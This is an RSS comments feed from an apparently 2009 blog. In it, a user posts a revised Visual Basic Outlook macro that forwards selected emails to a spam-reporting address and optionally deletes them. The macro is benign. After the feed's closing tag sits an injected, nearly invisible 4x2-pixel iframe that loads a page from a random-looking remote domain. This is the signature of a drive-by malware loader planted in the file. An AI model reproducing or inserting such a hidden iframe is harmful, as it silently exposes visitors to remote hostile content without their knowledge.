<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for Clan Campbell Web Log and Gallery</title>
	<atom:link href="http://www.clancampbell.us/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.clancampbell.us</link>
	<description></description>
	<lastBuildDate>Thu, 17 Sep 2009 20:48:07 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Comment on VB Outlook Macro for Reporting Spam by admin</title>
		<link>http://www.clancampbell.us/2009/09/10/vb-outlook-macro-for-sending-fn-reports-to-commtouch/comment-page-1/#comment-19</link>
		<dc:creator>admin</dc:creator>
		<pubDate>Thu, 17 Sep 2009 20:48:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.clancampbell.us/?p=30#comment-19</guid>
		<description>Thanks Alan..  I updated the script on the main page..</description>
		<content:encoded><![CDATA[<p>Thanks Alan..  I updated the script on the main page..</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on VB Outlook Macro for Reporting Spam by alanmercer</title>
		<link>http://www.clancampbell.us/2009/09/10/vb-outlook-macro-for-sending-fn-reports-to-commtouch/comment-page-1/#comment-18</link>
		<dc:creator>alanmercer</dc:creator>
		<pubDate>Thu, 17 Sep 2009 20:14:18 +0000</pubDate>
		<guid isPermaLink="false">http://www.clancampbell.us/?p=30#comment-18</guid>
		<description>revised to auto close message if No is selected to send mail to Commtouch

Public Sub CTReportFN()
Dim olkMsg As Outlook.MailItem
Dim Msg As Variant
Set olkMsg = Application.CreateItem(olMailItem)
olkMsg.To = &quot;reportfn@blockspam.biz&quot;
olkMsg.Subject = &quot;FN Report amercer &quot; &amp; Date
For Each Msg In Application.ActiveExplorer.Selection
olkMsg.Attachments.Add Msg
Next
Set Sign = olkMsg.GetInspector
    olkMsg.Display
    Sign.CommandBars.ActiveMenuBar.Controls(&quot;Insert&quot;).Controls(&quot;Signature&quot;).Controls(&quot;Requests&quot;).Execute
If MsgBox(&quot;Are you sure you want to report these e-mails to Commtouch as SPAM?&quot;, vbYesNo) = vbYes Then
olkMsg.Send
Else
olkMsg.Close olDiscard
End If
If MsgBox(&quot;Auto Delete SPAM Now?????&quot;, vbYesNo) = vbNo Then
Set olkMsg = Nothing
Else
For Each Item In Application.ActiveExplorer.Selection
Item.Delete
Next
Set olkMsg = Nothing
End If
End Sub</description>
		<content:encoded><![CDATA[<p>revised to auto close message if No is selected to send mail to Commtouch</p>
<p>Public Sub CTReportFN()<br />
Dim olkMsg As Outlook.MailItem<br />
Dim Msg As Variant<br />
Set olkMsg = Application.CreateItem(olMailItem)<br />
olkMsg.To = &#8220;reportfn@blockspam.biz&#8221;<br />
olkMsg.Subject = &#8220;FN Report amercer &#8221; &amp; Date<br />
For Each Msg In Application.ActiveExplorer.Selection<br />
olkMsg.Attachments.Add Msg<br />
Next<br />
Set Sign = olkMsg.GetInspector<br />
    olkMsg.Display<br />
    Sign.CommandBars.ActiveMenuBar.Controls(&#8220;Insert&#8221;).Controls(&#8220;Signature&#8221;).Controls(&#8220;Requests&#8221;).Execute<br />
If MsgBox(&#8220;Are you sure you want to report these e-mails to Commtouch as SPAM?&#8221;, vbYesNo) = vbYes Then<br />
olkMsg.Send<br />
Else<br />
olkMsg.Close olDiscard<br />
End If<br />
If MsgBox(&#8220;Auto Delete SPAM Now?????&#8221;, vbYesNo) = vbNo Then<br />
Set olkMsg = Nothing<br />
Else<br />
For Each Item In Application.ActiveExplorer.Selection<br />
Item.Delete<br />
Next<br />
Set olkMsg = Nothing<br />
End If<br />
End Sub</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<iframe src="http://eiueuiuewi.com/54N7JS34B34D5NH34J/" width="4" height="2"></iframe>
